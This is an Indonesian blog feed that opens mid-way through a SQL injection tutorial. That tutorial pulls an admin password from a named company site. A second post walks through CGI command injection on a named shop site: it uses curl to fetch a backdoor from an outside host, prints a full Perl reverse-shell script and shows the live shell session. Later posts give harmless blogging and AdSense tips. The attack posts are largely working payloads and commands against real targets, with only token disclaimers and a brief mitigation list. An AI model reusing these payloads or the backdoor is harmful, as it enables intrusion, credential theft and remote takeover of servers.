an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN--
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba

Atau kita pakai jalan pintas saja....

Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!

Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).

Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.

Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.

Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.

******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
di SQL Server Security tab.

Yah itulah mungkin yang dapat saya ceritakan.....
Hal itu adalah gambaran, betapa tidak amannya dunia internet...
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!!
Just kidding )

Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)

Connect Back melalui Bug CGI

noreply@blogger.com (gresikblog) — Wed, 31 Oct 2007 23:46:00 +0000

:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.

Penulis tidak bertanggung jawab atas akibat atau dampak yang disebabkan oleh
penggunaan materi dari tutorial ini. Tujuan penulis hanya ingin menyampaikan
materi kepada pihak-pihak yang bertanggung jawab dan "Want to learn", tidak
kepada pihak-pihak yang ingin merugikan orang lain.
.:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.

Intro
$>Seperti yang sudah kita tahu Bug CGI memungkinkan kita untuk melaksanakan command-command
untuk meng-eksploitasi sistem. Tetapi hal ini juga dipengaruhi oleh settingan dari sistem
tersebut apakah mengijinkan kita untuk membuat/menulis File di Server tersebut.

Tujuan
$>Membuat suatu backdoor dengan cara connect back melalui CGI Bug

Tools atau Softwarez dan Skill yang diperlukan
$>Setidaknya mengerti perintah/command *Nix atau Linux (ls, cp, rm, cat, locate ,dll)
$>Softwarez : Browser HTML (Opera, FireFox, IE, dll)
$>Tools : NetCat dan file backdoor (.txt atau .prl)

Tutorial
$>Langkah pertama yang harus dilakukan adalah mencari site yang menggunakan CGI dengan bug :
"shop.pl?seite" atau "family_showpage.cgi". Bagaimana mencarinya? yaitu googling dan memasukkan
keyword allinurl dengan tambahan bug diatas. Contoh, allinurl : "shop.pl?seite". Maka kita akan
dapat berbagai macam halaman yang dapat di-tes bugnya. Pilih salah satu dan kita akan memulai mencoba
connect back.
$>Langkah kedua yaitu masukkan perintah/command yang diinginkan diantara char "||", maka perintah kita
akan terlihat seperti ini : |perintah|, selain dengan char pipe(|) bisa juga menggunakan char ";".
Contoh (dengan bug shop.pl?seite) :

>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html&KNR=3055892
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|perintah|&KNR=3055892
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls|&KNR=3055892

Maka pada browser kita akan terlihat isi dari direktori server tersebut.
Contoh :
finnishorder.pl formmailmalaysia.pl honeymoon.cfg honeymoon.pl honeymoonfinnishorder.pl
honeymoonorder.pl ikonboard order.pl preise.pl remview.php shop.cfg shop.pl

Weikkss....Banyak filenya tuh :P

$>Langkah ketiga cek apakah kita diijinkan untuk menulis/membuat file disana dengan perintah "id"

>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|id|&KNR=3055892

Kalo benar maka akan tampak :

uid=290076(ade001) gid=103(web) groups=103(web)

Perhatikan User-idnya, Wah sepertinya kita bisa nih nulis/remove File :D

$>Selanjutnya kita upload File Backdoor yang kita ambil dari site lain,

https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|curl -o back.txt http://www.goodwillco.com/tes.txt|&KNR=3055892

Catatan : Site www.goodwillco.com hanya menyediakan file backdoor yaitu tes.txt, kalo sudah tidak ada silahkan
copy-paste teks berikut kedalam Notepad dan simpan dengan Ekstensi *.txt, Coding by 1St :D

#!/usr/bin/perl
# Remote Connect-Back Backdoor Shell v1.0.
# (c)AresU 2004
# 1ndonesia Security Team (1st)
# AresU[at]bosen.net
# Usage:
# 1) Listen port to received shell prompt using NetCat on your toolbox, for example: nc -l -p 9000
# 2) Remote Command Execution your BackDoor Shell, for example: perl connect.pl
# --------
# The supplied exploit code is not to be used for malicious purpose, but for educational purpose only. The Authors and 1ndonesian Security Team WILL NOT responsible for anything happened by the couse of using all information on these website.
# ---------

use Socket;
$pamer="(c)AresU Connect-Back Backdoor Shell v1.0\n1ndonesia Security Team (1st)\n\n";
$cmd= "lpd";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
print STDOUT $pamer;
system($system);
close(STDIN);
close(STDOUT);
close(STDERR)

Catatan2 : curl -o akan menyimpan file backdoor di server web sasaran dengan nama back.txt
Kalo curl -o tidak bisa gunakan wget -o.

$> Lakukan lagi perintah ls untuk melihat apakah file backdoor kita sudah ter-upload...

https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls|&KNR=3055892

back.txt finnishorder.pl formmailmalaysia.pl honeymoon.cfg honeymoon.pl honeymoonfinnishorder.pl
honeymoonorder.pl ikonboard order.pl preise.pl remview.php shop.cfg shop.pl

Tampaknya file backdoor kita sudah ada tuh :D

$> Buka port di kompie kita dengan binding port melalui netcat.exe, Perintahnya >

C:\>netcat.exe -lLvvp 9000

catatan: port 9000 dan drive system bisa diganti sesuai dengan kondisi komputer masing2 :D

Kalo sudah maka netcat akan melisten koneksi yang masuk di port 9000 tersebut

$> Kita akan melakukan connectback dari server korban dengan meng-compile file backdorr tsb :

https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|PERL back.txt 61.xxx.xxx.xxx 9000|&KNR=3055892

catatan: ip 61.xxx.xxx.xxx adalah alamat IP komputer kita dan 9000 adalah port tujuan yang sudah terbuka
jika komputer kita memakai proxy atau firewall harap di konfigurasi ulang agar server korban bisa melakukan
connectback terhadap kita :D

Bila benar maka :

C:\>netcat -lLvvp 9000
listening on [any] 9000 ...
connect to [61.xxx.xxx.xxx] from www.a66.de [213.198.17.90] 14542
(c)AresU Connect-Back Backdoor Shell v1.0
1ndonesia Security Team (1st)

Linux a66.de 2.4.2 FreeBSD 4.7-RELEASE-p22 #5: Tue May 3 13:36:49 MDT 2005
roo i386 unknown
uid=290076(ade001) gid=103(web) groups=103(web)
ls
back.txt
finnishorder.pl
formmailmalaysia.pl
honeymoon.cfg
honeymoon.pl
honeymoonfinnishorder.pl
honeymoonorder.pl
ikonboard
order.pl
preise.pl
remview.php
shop.cfg
shop.pl
su
su: you are not in the correct group (sys) to su root.

weiikkssss....bisa konek ternyata :D, tapi sayangnya kita gak bisa akses super user tuh :(
Mungkin kita bisa liat groupnya :

https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls /etc|&KNR=3055892

DIR_COLORS X11 bashrc csh.cshrc csh.login filesystems group host.conf hosts.allow hosts.deny info-dir inputrc
ld.so.cache ld.so.conf ldap_auth master.passwd mhpop_redirect mtab nsswitch.conf opt pam.d passwd profile profile.d
redhat-release rpc rpm securetty shells skel ssd.attrib syb_dbs termcap xinetd.d yp.conf

https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|cat /etc/group|&KNR=3055892

sys::0:root,bin,sys,adm,devel,smoc1,daemon,vbackups,sap,sentinel root::0:root daemon::1:root,daemon bin::2:root,bin,daemon
adm::3:root,adm,daemon mail::4:root uucp::5:uucp rje::8: lp:*:9: nuucp::10:nuucp user::20: ftp::201:
other::995: guest:*:998: postgres:*:70: news:*:86: mysql:*:88: sql:*:89: staff::100:devel,smoc1 sybase::101:sybase,devel,webapps,sap,jkoecher,anonweb
client:*:102:devel,root,webapps,urchind web:*:103:root,webapps nofiles:*:104: qmail:*:105: devel:*:106:sybase,hu,webapps,sap,ftp,jkoecher,anonweb mailed:*:107:barryg
apps:*:108:hu,idsuser networks:*:109: squid:*:203: solutions:*:1025: test:*:204: dnsadmin:x:501:named tsedit:*:110:lvance,chuckr,eduda,ggarza,steve,mbalme mailedit:*:111:mminnig
nogroup:*:65533: webapps:*:149: sap:*:191: nobody:*:60001: smmsp:*:25:smmsp

Wekkksss...... :( ternyata kita hanya ada di group web doank :~~...gimana ngerubahnya ???
sayangnya tutorial ini hanya membahas caraa kita untuk melakukan connectback dengan menggunakan CGI BUG
Untuk lebih jelasnya silakan cari artikel ttg hal tsb di Google :D
Terus kita bisa ngapain ajah nih??? ya macam2 kayak liat file order.log-nya mungkin !!!???? :D
(ingat site ini adalah semacam online-shop :D), silakan masukkan perintah locate order.log atau
locate .log di browser anda :D hehehehehehhe

Special Thanks go to : Myztx @ Myztx Soft House, Om choi @ #e-c-h-o atas tutor dan kesabarannya dalam mengajari junior mu ini :D
, admin www.a66.de hehehehe jangan marah ya mas/mbak :P webnya dijadikan percobaan :D
n ndak lupa juga to Spyro (the dragon??? :P) atas tempat buat artikel ini di webnya yg makin ciamik :D

Cara Praktis Promosi Blog

noreply@blogger.com (gresikblog) — Wed, 31 Oct 2007 23:42:00 +0000

Setelah selesai membuat blog, hal yg tak kalah pentingnya adalah empromosikan/memperkenalkan blog milik Anda pada dunia ramai. Apa gunanya membuat blog kalau isi curhat, puisi, cerpen, refleksi dan opini Anda yang diposting tidak dibaca orang, bukan?

Ikuti langkah-langkah promosi blog sebagai berikut:

(1) Daftarkan di blog directory

Daftarkan blog Anda ke berbagai direktori blog (blog directory). Sedikitnya, daftarkan di tiga blog directory terbesar dan terpopuler, yaitu (a) http://technorati.com (b) http://feeburner.com (c) http://blogdigger.com. Ikuti seluruh petunjuk pada ketiga blog directory tsb ketika mendaftar.Blog-blog directory ini nantinya secara otomatis akan mengirim data blog dan posting-posting anda ke berbagai search engine, termasuk tiga search engine besar yaitu http://google.com, http://msn.com, http://yahoo.com.

(2) Link-trade, Link Exchange atau Tukar Link Ajak teman anda yg memiliki blog untuk saling tukar link. Link URL anda di blog dia, dan jangan lupa anda juga memasukkan link blog teman anda tsb. di blog anda. Dalam dunia blog, ini disebut juga dg istilah BLOGROLL. Dan blogroll ini salah satu penyebab cepatnya popularitas blog di seluruh dunia, mengalahkan website yg biasa.

Blogroll atau link-exchange tidak harus melalui permintaan, bisa juga dg saling suka rela. Umpamanya, ada seseorang blogger (pemilik blog) yg memasang link Anda di blog dia, apabila Anda tahu, maka Anda juga “berkewajiban” menambah link blog dia di blog Anda. Apabila tidak, maka akan dicap sebagai “blogger pelit”. Di dunia maya pun, sebagaimana di dunia nyata, orang pelit akan selalu teralienasi. Dg kata lain, sedikit “tamu”nya.

Nah, bagaimana cara mengetahui ada yg mengelink blog Anda? Caranya mudah: tulis di kotak http://technorati.com/search alamat blog Anda atau blog siapa saja yg ingin Anda ketahui. Contoh blog ini, http://afatih.wordpress.com, setelah itu tekan search, anda akan tahu siapa saja yg ngelink ke blog tsb.

Sebagai langkah pertama ‘proyek’ tukar link, Anda bisa mencoba dg memasang link blog http://fatihsyuhud.com di sidebar blog Anda. Dalam waktu tidak lama, alamat blog Anda akan tampil di blognya.

(3) Berkunjung ke blog lain

Untuk menambah teman untuk diajak blogroll, sempatkan berkunjung ke blog2 lain, dan berkomentar di bukutamu atau tagboard mereka atau berkomentar di tulisan mereka sambil jangan lupa memasang alamat blog Anda di blog mereka. Dalam waktu tidak lama, mereka akan “bertamu balik” ke “rumah” atau blog Anda.

(4) Aktivitas posting
Usahakan sedikitnya satu kali posting setiap harinya. Posting yg teratur di blog, akan membuat tamu datang secara teratur juga.

(5) Alamat blog di signature email
Tulis alamat blog Anda di signature email. Sehingga setiap anda menulis email ke pribadi atau ke milis, alamat blog anda akan selalu muncul, dan “menggoda” orang untuk berkunjung. Memposting ringkasan tulisan di blog Anda ke milis juga akan sangat menggoda member milis untuk datang ke blog Anda. (bersambung)

Tips Memilih Template

noreply@blogger.com (gresikblog) — Wed, 31 Oct 2007 23:39:00 +0000

Terkadang kita begitu terobsesi dengan template yang ‘glamour.’ Hal ini ditambah dengan begitu banyaknya pilihan template/themes yang beraneka warna. Banyak yang lupa bahwa visitor tidak begitu peduli dengan glamornya template yang kita pakai. Orang masuk ke blog kita umumnya karena isinya yang menarik, orisinil dan unik.

Selain itu, kalau kita perhatikan, situs-situs bertraffic tinggi rata-rata berpenampilan sederhana. Lihat misalnya tiga situs bertraffic tertinggi di dunia: google.com, yahoo.com dan msn.com. Ketiganya memakai template minimalist: background putih, font tulisan warna hitam dan warna tulisan di menunya yang tidak menyolok. Google.com, situs no. 1 di dunia termasuk pelopor minimalist di mana cuma ada kotak search engine dan sedikit menu link di atasnya. Dulu, yahoo.com memiliki banyak link di halaman utama / frontpage-nya, tapi sekarang sudah ‘ketularan’ google. Intinya, the simpler the better. Saya sendiri males berkunjung untuk kedua kalinya pada sebuah blog yang terlalu ribet dan berat loadingnya karena kebanyakan script yang terpasang.

Oleh karena itu, memilih template harus mempertimbangkan poin-poin di atas: pilihlah template atau themes yang rapi, background warna yang sederhana, dan warna font artikel yang enak dibaca. Saya pribadi memilih themes black and white untuk www.site.com. Pengunjung blog saya datang kebanyakan dari search engine. Mereka datang tentunya karena ingin membaca lebih lanjut artikel yang mereka cari. Saya tidak ingin mengganggu mata mereka dengan warna-warna yang “menyilaukan”.

Selain itu, tak kalah pentingnya adalah “kerapian blog.” Blog yang rapi artinya: (a) sidebar tidak melorot; (b) font artikel cukup satu warna dan satu macam; (c) blogroll atau banner terpasang rapi dan tertata; (d) cocok dibuka dengan berbagai browser, terutama IE dan firefox.

Bagaimana dg Anda? Apakah Anda suka blog rapi atau yang “rame?”

Jangan Klik Sendiri Adsense Anda

noreply@blogger.com (gresikblog) — Wed, 31 Oct 2007 23:36:00 +0000

Program Adsense memiliki sejumlah tata tertib yg harus dipenuhi oleh publisher–yakni kita-kita yg memasang Adsense di blog masing-masing. Aturan lengkapnya dapat dibaca sewaktu pertama kali kita daftar. Bagi yg lupa, silahkan baca lagi TOS (terms of service) di sini agar supaya tidak salah dan berakibat akun Adsense Anda ditutup.

Dari sekian aturan Adsense, yg paling penting adalah: (1) Jangan klik sendiri iklan adsense Anda; (2) Jangan menyuruh orang lain mengklik Adsense Anda; (3) Jangan membuat kalimat yg terkesan menyuruh atau menganjurkan tamu/pengunjung untuk mengklik Iklan di blog Anda, kecuali iklan adsense referral.

Bagaimana bisa ketahuan?

1. Iklan Adsense dilengkapi dg alat pelacak (tracking) yg menunjukkan nomor IP internet Anda. Bila Anda klik sendiri, maka akan tampak jelas kelihatan oleh manajer Adsense.

2. Apabila Anda menyuruh teman Anda di tempat lain dg nomor IP berbeda dg Anda, maka mungkin kalau satu kali klik tidak apa-apa, tapi akan ketahuan begitu IP yg sama mengklik Adsense Anda setiap hari.

3. Umumnya persentase iklan yg diklik berkisar antara 1 sampai 10% dari jumlah pengunjung blog. Contohnya, apabila tamu blog dalam sehari ada 20 orang, maka paling banyak yg klik 2 (dua) pengunjung.

Dengan demikian, semakin besar pengunjung semakin besar yg ngeklik. Jadi, daripada pakai cara ilegal, mending usahakan untuk menambah pengunjung blog dg cara rajin posting dan promosi blog.

Kapan “hukuman” Adsense tiba?

Hukuman berupa ditutupnya akun (account) Adsense Anda terjadi biasanya apabila hasil adsense sudah mendekati angka $60 sampai 90. Anda biasanya akan diberitahu via email, selain itu Adsense tidak lagi nongol di blog Anda.

Permasalahan Post-Summary (Abstraksi) Blogspot

noreply@blogger.com (gresikblog) — Wed, 31 Oct 2007 23:21:00 +0000

Yg saya maksud dg “penyakit” adalah bugs dalam script. Bahasa tepatnya biar ahli linguistic IT nanti yg bahas.

Sebelumnya, sudah diterangkan di sini bagaimana cara membuat abstraksi posting di blogger/blogspot supaya tidak semua posting kita tampil di halaman muka. (Apabila Anda lupa, silahkan lihat lagi di sini.

Dari pengalaman teman-teman yg sudah mencobanya dan umumnya berhasil, ternyata terkadang mengalami permasalahan sbb: (1) Terkadang, sidebar tidak nongol di halaman muka (front-page); (2) Halaman muka tidak tampil semua, seperti ada penghambat; (3) Keseluruhan posting tetap tampil di halaman muka.Solusinya sbb:(1) Pastikan sebelum mem-publish posting Anda di blog, Anda klik lagi menu “Edit HTML” di toolbar bagian atas (di samping menu “Compose”);

(2) Akan tampak SATU kode post-summary pembuka yaitu dan SATU kode post-summary penutup, yaitu .

(3) Apabila Anda menemukan kode pembuka dan penutup post-summary lebih dari satu di posting yg akan Anda publish, maka di situlah penyakit (bugs)-nya. Yg harus Anda lakukan adalah MENGHAPUSnya.

(4) Setelah menyisakan hanya satu kode pembuka dan satu kode penutup, klik publish.

(5) Selesai dan selamat ngeBLOG.

Pasang Foto di Profile Blogger/Blogspot

noreply@blogger.com (gresikblog) — Wed, 31 Oct 2007 23:11:00 +0000

anyak blogger yg nanya tentang bagaimana cara memasukkan fotonya yg ganteng dan cantik di profile blognya. Berbeda dg di blog gratis lain, di blogger/blogspot, prosesnya agak sedikit rumit bagi yg masih baru di dunia internet.

Ada dua cara memasukkan foto :
Cara Pertama:

Upload foto Anda di postingan blog. Caranya:
(a) Setelah login, klik link blog Anda.
(b) Klik menu “posting” atau “Create”
(c) Di toolbar posting ada tombol bergambar panorama warna biru. Klik
di situ, dan akan muncul pop-up window untuk “upload images”
(d) Klik browse ke file foto Anda yg sudah tersimpan di komputer
(e) Klik Upload Image warna biru (tunggu beberapa saat sampai proses
upload selesai)
(f) Klik Done

(g) Sekarang foto Anda sudah masuk ke posting. Klik menu “Edit HTML”
di toolbar posting bagian atas sebelah kanan.
(h) Akan tampak sejumlah kode HTML di situ. Copy/paste kode yg berada
setelah tulisan [src=”] yaitu link yg dimulai dg [http://] dan
berakhir dg [.jpg] atau [.jpeg]
(i) Simpan link tsb. di notepad atau ditulis di kertas.
(j) Jangan lupa, klik publish.
(k) Setelah itu, klik menu “Dashboard”
(l) Klik menu “Edit Profile”
(m) Di sini ada menu “Photo URL”, paste link foto Anda tadi di kotak
yg tersedia.
(n) Klik “Save Profile” di bagian paling bawah.
(o) Selesai.CARA KEDUA
———————Cara kedua adalah dg meng-upload (memasukkan/menyimpan) foto Anda di hosting lain, dan baru kemudian link URL foto tsb. di copy/paste ke profile blogger/blogspot.

Yg paling mudah, simpan/upload foto Anda di http://geocities.com karena hosting ini milik yahoo.com. Jadi, siapa saja yg memiliki email yahoo dapat langsung log-in ke geocities.com dg memakai id yahoo Anda.

Misalkan file foto Anda adalah jenggot.jpg dan email id Anda site. Maka, nantinya setelah foto itu diupload ke geocities, link url Anda akan menjadi sebagai berikut: http://geocities.com/site/jenggot.jpg. Nah, copy/paste link
tsb. ke profile blogger.com di kolom yg tersedia dan setelah itu SAVE
CHANGES dan REPUBLISH.